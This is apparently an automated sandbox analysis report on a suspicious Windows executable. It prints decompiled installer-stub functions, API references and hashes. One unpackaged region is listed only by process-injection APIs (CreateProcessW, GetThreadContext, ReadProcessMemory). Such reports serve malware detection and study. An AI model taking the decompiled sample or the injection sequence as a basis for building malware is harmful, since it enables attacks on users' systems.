SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040163D

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-47812868
Opcode ID: b62097c57e7d34c826c8a34a39378d9677be106aa900e81be982e0e3289ee102
Instruction ID: afcdff62d0ef6905e8bdcee54b475e891262542c39ccdc99bb158fdd5f3a4caf
Opcode Fuzzy Hash: b62097c57e7d34c826c8a34a39378d9677be106aa900e81be982e0e3289ee102
Instruction Fuzzy Hash: BB012631908141ABDB213B755C449BF7BB0DA62774B68063FF8D1B22E2C63C49468A3F

Uniqueness

Uniqueness Score: -1.00%

Function 004056DB, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056DB(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x004056df
0x004056e5
0x004056e6
0x004056e6
0x004056e7
0x004056ee
0x004056f8
0x00405705
0x00405708
0x00405710
0x00000000
0x00000000
0x00405714
0x00000000
0x00000000
0x00405716
0x00000000
0x00405716
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004056EE
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403164,"C:\Users\user\Desktop\eQLPRPErea.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 00405708

Strings

nsa, xrefs: 004056E7
C:\Users\user\AppData\Local\Temp\, xrefs: 004056DE
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056DB

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
API String ID: 1716503409-3657371456
Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
Instruction ID: 324ea9cf7fdad1bcdd77eed69f700b3778f381b3ee49d7efb620425ca15f8701
Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
Instruction Fuzzy Hash: 95F0203230C208BAEB104E19EC04B9B3F98DFD1720F10C03BFA089A1C0D2B0994897A9

Uniqueness

Uniqueness Score: -1.00%

Function 02910034, Relevance: 6.6, APIs: 4, Instructions: 555processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0291037D
GetThreadContext.KERNELBASE(?,00010007), ref: 029103A0
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 029103C4

Memory Dump Source

Source File: 00000001.00000002.704501869.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: Process$ContextCreateMemoryReadThread
String ID:
API String ID: 2411489757-0
Opcode ID: 2ab63fe0816a04042a1a8a06adcb157022e28ae463fd4121ca8af8d5c91f2f5b
Instruction ID: 55d07ec3976d8cff2bb0dca4dbdd5817c5714211884ba5327f6710a94e1fc3f1
Opcode Fuzzy Hash: 2ab63fe0816a04042a1a8a06adcb157022e28ae463fd4121ca8af8d5c91f2f5b
Instruction Fuzzy Hash: BC322531E5021CEFEB20DBA5DC45BADB7B5BF48705F20449AEA18FA2A0D7715A80CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00403132, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403132(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405C17(_t6);
				_t2 = E00405554(_t6);
				if(_t2 != 0) {
					E004054E8(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056DB("\"C:\\Users\\jones\\Desktop\\eQLPRPErea.exe\" ", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x00403133
0x00403139
0x0040313f
0x00403146
0x0040314b
0x00403153
0x0040315f
0x00403165
0x00403149
0x00403149
0x00403149

APIs

Part of subcall function 00405C17: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C6F
Part of subcall function 00405C17: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C7C
Part of subcall function 00405C17: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C81
Part of subcall function 00405C17: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C91

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00403153

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403133, 00403138, 0040313E, 0040314A, 00403152, 00403159
"C:\Users\user\Desktop\eQLPRPErea.exe" , xrefs: 0040315A

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: "C:\Users\user\Desktop\eQLPRPErea.exe" $C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-1376844923
Opcode ID: 9f26b915baf4af9ee834ce2d89a8bc0c97eabdbefea6e2b6526d35449a18764c
Instruction ID: 79f712b3a5127264f0764a8e69035eccad8d8fc9e3ddf1834021473dbb68359f
Opcode Fuzzy Hash: 9f26b915baf4af9ee834ce2d89a8bc0c97eabdbefea6e2b6526d35449a18764c
Instruction Fuzzy Hash: C0D0C92195AD3076D952362A3E06FCF154C8F5AB6AF529077F508B90C68B6C1AC309FE

Uniqueness

Uniqueness Score: -1.00%

Function 00401B71, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401B71(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x1c));
				_t30 =  *0x40b040; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x20)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x404); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E004059FD(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x24)));
						_t12 =  *0x40b040; // 0x0
						 *_t34 = _t12;
						 *0x40b040 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t30 + 4; // 0x4
							E004059DB(_t33, _t3);
							_push(_t30);
							 *0x40b040 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t30 == _t28) {
							break;
						}
						_t30 =  *_t30;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t30 == _t28) {
								break;
							} else {
								_t32 = _t30 + 4;
								E004059DB(0x409c40, _t30 + 4);
								_t22 =  *0x40b040; // 0x0
								E004059DB(_t32, _t22 + 4);
								_t25 =  *0x40b040; // 0x0
								_push(0x409c40);
								_push(_t25 + 4);
								E004059DB();
								L15:
								 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004059FD(_t28, _t30, _t33, _t28, 0xffffffe8));
					E004052DB();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b71
0x00401b71
0x00401b74
0x00401b7c
0x00401bc5
0x00401bf3
0x00401bfc
0x00401bfe
0x00401c02
0x00401c07
0x00401c0c
0x00401c0e
0x00401bc7
0x00401bc9
0x004026da
0x00401bcf
0x00401bcf
0x00401bd4
0x00401bdb
0x00401bdc
0x00401be1
0x00401be1
0x00401bc9
0x00000000
0x00401b7e
0x00401b7e
0x00401b7e
0x00401b81
0x00000000
0x00000000
0x00401b87
0x00401b8b
0x00000000
0x00401b8d
0x00401b8f
0x00000000
0x00401b95
0x00401b95
0x00401b9f
0x00401ba4
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbc
0x00402855
0x0040292f
0x00402932
0x00402938
0x00402938
0x00401b8f
0x00000000
0x00401b8b
0x00402280
0x0040228d
0x0040228e
0x00402293
0x00402293
0x0040293a
0x0040293e

APIs

GlobalFree.KERNEL32 ref: 00401BE1
GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BF3

Strings

YVfgfgfgfgfg, xrefs: 00401B98, 00401B9E, 00401BB8

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree
String ID: YVfgfgfgfgfg
API String ID: 3394109436-2960783394
Opcode ID: 4cb0680da1612d327d02e908c402c3bf8643f2045f08bdd5315ede493e019c16
Instruction ID: bd949401c8ecd51624a1a682cd912c9b1b8eabceb619d2a9202a94e4464cd785
Opcode Fuzzy Hash: 4cb0680da1612d327d02e908c402c3bf8643f2045f08bdd5315ede493e019c16
Instruction Fuzzy Hash: 0E2190F2A04505DBCB10EB95DE84A9F72B9EB44328721013BF612B32D1E77CA8459B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040136D, Relevance: 3.1, APIs: 2, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040136D(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x42f450;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E00405952(0x430000 - (_t10 + 1 << 0xa), 0x430000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags = _a11;
					if(_a11 != 0) {
						 *0x42ec0c =  *0x42ec0c + _t13;
						_t14 =  *0x42ebf4; // 0x0
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA(_a11, 0x402, MulDiv( *0x42ec0c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}

0x0040136e
0x004013fb
0x00401382
0x00401384
0x00401387
0x00000000
0x00000000
0x00401389
0x0040138a
0x0040138f
0x00401394
0x00000000
0x00401409
0x00401396
0x00401398
0x004013a6
0x004013ab
0x004013ab
0x004013ad
0x004013b5
0x004013b6
0x004013b8
0x004013ba
0x004013ba
0x004013af
0x004013b1
0x004013b2
0x004013b2
0x004013bc
0x004013c1
0x004013c3
0x004013c9
0x004013d2
0x004013d7
0x004013d7
0x004013f5
0x004013f5
0x004013c1
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 52571e9a05d543f28becb04bb20ff3b97162573d1bf40450b7f866ea0ca4ed37
Instruction ID: cf07787b3771b01f225f0462f812935fb09dc15a82745279c290e788aa7168a4
Opcode Fuzzy Hash: 52571e9a05d543f28becb04bb20ff3b97162573d1bf40450b7f866ea0ca4ed37
Instruction Fuzzy Hash: A101DE727242109FE7185B3ADD09B3B26D8E714318F40423EF952E66F0E6B8EC028B49

Uniqueness

Uniqueness Score: -1.00%

Function 004056AC, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004056AC(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x004056b0
0x004056bd
0x004056d2
0x004056d8

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056B0
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056D2

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16

Uniqueness

Uniqueness Score: -1.00%

Function 004030E9, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030E9(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004030ed
0x00403100
0x00403108
0x00000000
0x0040310f
0x00000000
0x00403111

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0C,000000FF,00000004,00000000,00000000,00000000), ref: 00403100

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
Instruction ID: e81e275afb49510b14cdae0e049fdcddcae928b761bf1a0ea33109ac8d4bf1d9
Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
Instruction Fuzzy Hash: 03E08C32514118BBDF105E52DC01EE77B7CEB087A2F008032FD04EA191D631EE11DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040311B, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040311B(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}

0x00403129
0x0040312f

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00403129

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404EBC, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00404EBC(long _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				CHAR* _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t86;
				struct HMENU__* _t88;
				unsigned int _t91;
				unsigned int _t92;
				int _t93;
				int _t94;
				long _t97;
				void* _t100;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				CHAR* _t162;
				CHAR* _t163;

				_t153 =  *0x42ec04; // 0x0
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E50, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L16:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L24:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L19;
							}
							__eflags = _a12 - _t153;
							if(_a12 != _t153) {
								goto L19;
							}
							_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
							__eflags = _t86 - _t148;
							_a8 = _t86;
							if(_t86 <= _t148) {
								L36:
								return 0;
							}
							_t88 = CreatePopupMenu();
							_push(0xffffffe1);
							_push(_t148);
							_t159 = _t88;
							AppendMenuA(_t159, _t148, 1, E004059FD(_t148, _t153, _t159));
							_t91 = _a16;
							__eflags = _t91 - 0xffffffff;
							if(_t91 != 0xffffffff) {
								_t149 = _t91;
								_t92 = _t91 >> 0x10;
								__eflags = _t92;
								_t93 = _t92;
							} else {
								GetWindowRect(_t153,  &_v24);
								_t149 = _v24.left;
								_t93 = _v24.top;
							}
							_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
							_t161 = 1;
							__eflags = _t94 - 1;
							if(_t94 == 1) {
								_v56 = _t148;
								_v44 = 0x42a8a0;
								_v40 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t97 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t148;
									_t161 = _t161 + _t97 + 2;
								} while (_a4 != _t148);
								OpenClipboard(_t148);
								EmptyClipboard();
								_t100 = GlobalAlloc(0x42, _t161);
								_a4 = _t100;
								_t162 = GlobalLock(_t100);
								do {
									_v44 = _t162;
									SendMessageA(_v8, 0x102d, _t148,  &_v64);
									_t163 =  &(_t162[lstrlenA(_t162)]);
									 *_t163 = 0xa0d;
									_t162 =  &(_t163[2]);
									_t148 = _t148 + 1;
									__eflags = _t148 - _a8;
								} while (_t148 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t148; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f424, 8);
							__eflags =  *0x42f4ac - _t148;
							if( *0x42f4ac == _t148) {
								E00404D7E( *((intOrPtr*)( *0x42a078 + 0x34)), _t148);
							}
							E00403D9C(1);
							goto L24;
						}
						 *0x429c70 = 2;
						E00403D9C(0x78);
						goto L19;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L19:
							return E00403E2A(_a8, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t148);
						ShowWindow(_t153, 8);
						E00404196();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42f428;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t127;
				_v8 = _t127;
				E00403DF8( *0x42ebf0);
				 *0x42ebf4 = E00404616(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DC3(_a4);
				if(( *0x42f430 & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t148);
					if(( *0x42f430 & 0x00000002) != 0) {
						 *0x42ebf0 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x42f430 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L36;
			}

0x00404ec5
0x00404ecb
0x00404ed4
0x00404ed7
0x0040505d
0x00405064
0x00405088
0x00405088
0x0040508e
0x0040509b
0x004050b8
0x004050b8
0x004050bf
0x00405116
0x00405116
0x0040511a
0x00000000
0x00000000
0x0040511c
0x0040511f
0x00000000
0x00000000
0x00405129
0x0040512f
0x00405131
0x00405134
0x00405231
0x00000000
0x00405231
0x0040513a
0x00405140
0x00405142
0x00405143
0x0040514f
0x00405155
0x00405158
0x0040515b
0x00405170
0x00405173
0x00405173
0x00405176
0x0040515d
0x00405162
0x00405168
0x0040516b
0x0040516b
0x00405184
0x0040518c
0x0040518d
0x0040518f
0x00405198
0x0040519b
0x004051a2
0x004051a9
0x004051b1
0x004051b1
0x004051bf
0x004051c5
0x004051c8
0x004051c8
0x004051cf
0x004051d5
0x004051de
0x004051e5
0x004051ee
0x004051f0
0x004051f3
0x004051fc
0x00405208
0x0040520a
0x00405210
0x00405211
0x00405212
0x00405212
0x0040521a
0x00405225
0x0040522b
0x0040522b
0x00000000
0x0040518f
0x004050c1
0x004050c7
0x004050f7
0x004050f9
0x004050ff
0x0040510a
0x0040510a
0x00405111
0x00000000
0x00405111
0x004050cb
0x004050d5
0x00000000
0x0040509d
0x0040509d
0x004050a3
0x004050da
0x00000000
0x004050e3
0x004050ac
0x004050b1
0x004050b3
0x00000000
0x004050b3
0x0040509b
0x00404edd
0x00404ee1
0x00404eea
0x00404ef1
0x00404ef4
0x00404ef7
0x00404efa
0x00404efb
0x00404efc
0x00404f15
0x00404f18
0x00404f22
0x00404f31
0x00404f39
0x00404f41
0x00404f46
0x00404f49
0x00404f55
0x00404f5e
0x00404f67
